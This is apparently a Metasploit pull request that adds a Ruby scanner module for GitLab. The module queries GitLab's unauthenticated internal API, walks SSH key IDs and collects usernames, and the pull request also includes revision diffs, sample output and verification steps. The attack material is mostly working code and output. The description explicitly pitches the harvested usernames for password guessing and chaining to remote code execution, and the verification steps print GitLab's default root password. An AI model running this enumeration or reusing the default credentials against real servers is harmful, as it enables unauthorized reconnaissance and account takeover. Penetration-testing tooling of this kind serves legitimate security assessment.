### PR TITLE
Gitlab Unauth User Enumeration

### DIFF
--- a/modules/auxiliary/scanner/http/gitlab_user_enum.rb
+++ b/modules/auxiliary/scanner/http/gitlab_user_enum.rb
@@ -1,0 +1,93 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/http'
+require 'msf/core'
+require 'json'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Gitlab User Enumeration',
+      'Description' => %q(
+        The Gitlab 'internal' API is exposed unauthenticated on Gitlab. This
+        allows the username for each SSH Key ID number to be retrieved. Users
+        who do not have an SSH Key cannot be enumerated in this fashion.
+      ),
+      'Author'      => 'Ben Campbell',
+      'License'     => MSF_LICENSE
+      ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Path to Gitlab instance', '/']),
+        OptInt.new('START_ID', [true, 'ID number to start from', 0]),
+        OptInt.new('END_ID', [true, 'ID number to enumerate up to', 50])
+      ], self.class)
+  end
+
+  def run_host(_ip)
+    api = '/api/v3'
+    internal_api = "#{api}/internal"
+    check = normalize_uri(target_uri.path, internal_api, 'check')
+
+    print_status('Sending gitlab version request...')
+    res = send_request_cgi(
+        'uri' => check
+    )
+
+    if res && res.code == 200 && res.body
+      version = JSON.parse(res.body)
+      git_version = version['gitlab_version']
+      git_revision = version['gitlab_rev']
+      print_good("GitLab version: #{git_version} revision: #{git_revision}")
+
+      report_service(
+        host: rhost,
+        port: rport,
+        name: (ssl ? 'https' : 'http'),
+        proto: 'tcp'
+      )
+
+      report_web_site(
+        host: rhost,
+        port: rport,
+        ssl: ssl,
+        info: "Gitlab Version - #{git_version}"
+      )
+    else
+      print_error('Unable to retrieve Gitlab version...')
+      return
+    end
+
+    discover = normalize_uri(target_uri.path, internal_api, 'discover')
+
+    print_status("Enumerating user keys #{datastore['START_ID']}-#{datastore['END_ID']}...")
+    datastore['START_ID'].upto(datastore['END_ID']) do |id|
+      res = send_request_cgi(
+          'uri'       => discover,
+          'method'    => 'GET',
+          'vars_get'  => { 'key_id' => id }
+        )
+
+      if res && res.code == 200 &&  res.body
+        begin
+          user = JSON.parse(res.body)
+          print_good("Key-ID: #{id} Username: #{user['username']} Name: #{user['name']}")
+        rescue JSON::ParserError
+          print_error("Key-ID: #{id} - Unexpected response body: #{res.body}")
+        end
+      elsif res
+        vprint_status("Key-ID: #{id} not found")
+      else
+        print_error('Connection timed out...')
+      end
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/gitlab_user_enum.rb
+++ b/modules/auxiliary/scanner/http/gitlab_user_enum.rb
@@ -25,11 +25,7 @@ class Metasploit3 < Msf::Auxiliary
       ",
       'Author'      => 'Ben Campbell',
       'License'     => MSF_LICENSE,
-      'DisclosureDate' => 'Oct 15 2014',
-      'References'     =>
-        [
-          [ 'URL', 'https://labs.mwrinfosecurity.com/tools/gitlab-user-enumeration-metasploit-module' ]
-        ]
+      'DisclosureDate' => 'Nov 21 2014'
     ))
 
     register_options(

--- a/modules/auxiliary/scanner/http/gitlab_user_enum.rb
+++ b/modules/auxiliary/scanner/http/gitlab_user_enum.rb
@@ -20,8 +20,8 @@ class Metasploit3 < Msf::Auxiliary
         The Gitlab 'internal' API is exposed unauthenticated on Gitlab. This
         allows the username for each SSH Key ID number to be retrieved. Users
         who do not have an SSH Key cannot be enumerated in this fashion. LDAP
-        users, e.g. Active Directory users will also be returned.
-        This issue was fixed in Gitlab v7.5.0.
+        users, e.g. Active Directory users will also be returned. This issue
+        was fixed in Gitlab v7.5.0 and is present from Gitlab v5.0.0.
       ",
       'Author'      => 'Ben Campbell',
       'License'     => MSF_LICENSE,
@@ -41,8 +41,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run_host(_ip)
-    api = '/api/v3'
-    internal_api = "#{api}/internal"
+    internal_api = '/api/v3/internal'
     check = normalize_uri(target_uri.path, internal_api, 'check')
 
     print_status('Sending gitlab version request...')
@@ -56,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
       git_revision = version['gitlab_rev']
       print_good("GitLab version: #{git_version} revision: #{git_revision}")
 
-      report_service(
+      service = report_service(
         host: rhost,
         port: rport,
         name: (ssl ? 'https' : 'http'),
@@ -106,19 +105,11 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     unless users.nil? || users.to_s.empty?
-      store_userlist(users)
+      store_userlist(users, service)
     end
   end
 
-  def store_userlist(users)
-    name = datastore['SSL'] ? 'https' : 'http'
-    service = report_service(
-      :host  => rhost,
-      :port => rport,
-      :name => name,
-      :proto => 'tcp'
-    )
-
+  def store_userlist(users, service)
     loot = store_loot('gitlab.users', 'text/plain', rhost, users, nil, 'Gitlab Users', service)
     print_good("Userlist stored at #{loot}")
   end

--- a/modules/auxiliary/scanner/http/gitlab_user_enum.rb
+++ b/modules/auxiliary/scanner/http/gitlab_user_enum.rb
@@ -15,13 +15,13 @@ class Metasploit3 < Msf::Auxiliary
   def initialize(info = {})
     super(update_info(
       info,
-      'Name'        => 'Gitlab User Enumeration',
+      'Name'        => 'GitLab User Enumeration',
       'Description' => "
-        The Gitlab 'internal' API is exposed unauthenticated on Gitlab. This
+        The GitLab 'internal' API is exposed unauthenticated on GitLab. This
         allows the username for each SSH Key ID number to be retrieved. Users
         who do not have an SSH Key cannot be enumerated in this fashion. LDAP
         users, e.g. Active Directory users will also be returned. This issue
-        was fixed in Gitlab v7.5.0 and is present from Gitlab v5.0.0.
+        was fixed in GitLab v7.5.0 and is present from GitLab v5.0.0.
       ",
       'Author'      => 'Ben Campbell',
       'License'     => MSF_LICENSE,
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
       [
-        OptString.new('TARGETURI', [ true, 'Path to Gitlab instance', '/']),
+        OptString.new('TARGETURI', [ true, 'Path to GitLab instance', '/']),
         OptInt.new('START_ID', [true, 'ID number to start from', 0]),
         OptInt.new('END_ID', [true, 'ID number to enumerate up to', 50])
       ], self.class)
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
     internal_api = '/api/v3/internal'
     check = normalize_uri(target_uri.path, internal_api, 'check')
 
-    print_status('Sending gitlab version request...')
+    print_status('Sending GitLab version request...')
     res = send_request_cgi(
         'uri' => check
     )
@@ -66,12 +66,12 @@ class Metasploit3 < Msf::Auxiliary
         host: rhost,
         port: rport,
         ssl: ssl,
-        info: "Gitlab Version - #{git_version}"
+        info: "GitLab Version - #{git_version}"
       )
     elsif res && res.code == 401
-      fail_with(Failure::NotVulnerable, 'Unable to retrieve Gitlab version...')
+      fail_with(Failure::NotVulnerable, 'Unable to retrieve GitLab version...')
     else
-      fail_with(Failure::Unknown, 'Unable to retrieve Gitlab version...')
+      fail_with(Failure::Unknown, 'Unable to retrieve GitLab version...')
     end
 
     discover = normalize_uri(target_uri.path, internal_api, 'discover')
@@ -110,12 +110,11 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def store_userlist(users, service)
-    loot = store_loot('gitlab.users', 'text/plain', rhost, users, nil, 'Gitlab Users', service)
+    loot = store_loot('gitlab.users', 'text/plain', rhost, users, nil, 'GitLab Users', service)
     print_good("Userlist stored at #{loot}")
   end
 
   def store_username(username, res)
-    # Should the service be 'Gitlab'?
     service = ssl ? 'https' : 'http'
     service_data = {
       address: rhost,

--- a/modules/auxiliary/scanner/http/gitlab_user_enum.rb
+++ b/modules/auxiliary/scanner/http/gitlab_user_enum.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
       'DisclosureDate' => 'Oct 15 2014',
       'References'     =>
         [
-          [ 'URL', 'https://labs.mwrinfosecurity.com/tools/' ]
+          [ 'URL', 'https://labs.mwrinfosecurity.com/tools/gitlab-user-enumeration-metasploit-module' ]
         ]
     ))
 
@@ -69,18 +69,10 @@ class Metasploit3 < Msf::Auxiliary
         ssl: ssl,
         info: "Gitlab Version - #{git_version}"
       )
-    else
+    elsif res && res.code == 401
+      fail_with(Failure::NotVulnerable, 'Unable to retrieve Gitlab version...')
+    else 
       fail_with(Failure::Unknown, 'Unable to retrieve Gitlab version...')
-    end
-
-    major, minor, _ = git_version.split('.')
-
-    if major.to_i > 7
-      fail_with(Failure::NotVulnerable, "Version #{git_version} is not vulnerable.")
-    else
-      if major.to_i == 7 && minor.to_i >= 5
-        fail_with(Failure::NotVulnerable, "Version #{git_version} is not vulnerable.")
-      end
     end
 
     discover = normalize_uri(target_uri.path, internal_api, 'discover')


### PR DESCRIPTION
This abuses the gitlab api to enumerate usernames from an unauthenticated perspective if they have a registered SSH key. The majority of users are expected to have a valid SSH key in a working environment...

Passwords can then be guessed to then try and exploit the remote code execution vulns that exist if your versions align.
## Example

```
[*] Sending gitlab version request...
[+] GitLab version: 7.4.5 revision: 19d572e
[*] Enumerating user keys 0-50...
[+] Key-ID: 1 Username: test Name: Test
[+] Key-ID: 2 Username: Administrator Name: Administrator
[+] Key-ID: 3 Username: ldap_user1 Name: ldap
[+] Userlist stored at /home/ben/.msf4/loot/20150317100314_default_127.1.1.1_gitlab.users_492748.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
## Verification
- [x] `wget https://downloads-packages.s3.amazonaws.com/ubuntu-12.04/gitlab_7.4.5-omnibus.5.1.0.ci-1_amd64.deb`
- [x] `sudo dpkg -i gitlab_7.4.5-omnibus.5.1.0.ci-1_amd64.deb`
- [x] `sudo vim /etc/gitlab/gitlab.rb`
- [x] Change  `external_url 'host'` to `external_url = 'host'` to fix deployment bug.
- [x] `sudo gitlab-ctl reconfigure`
- [x] Login to console with root:5iveL!fe
- [x] Add some users with SSH keys
- [x] Run module
- [x] `creds` and see if users are reported
- [x] Check loot file for list of users
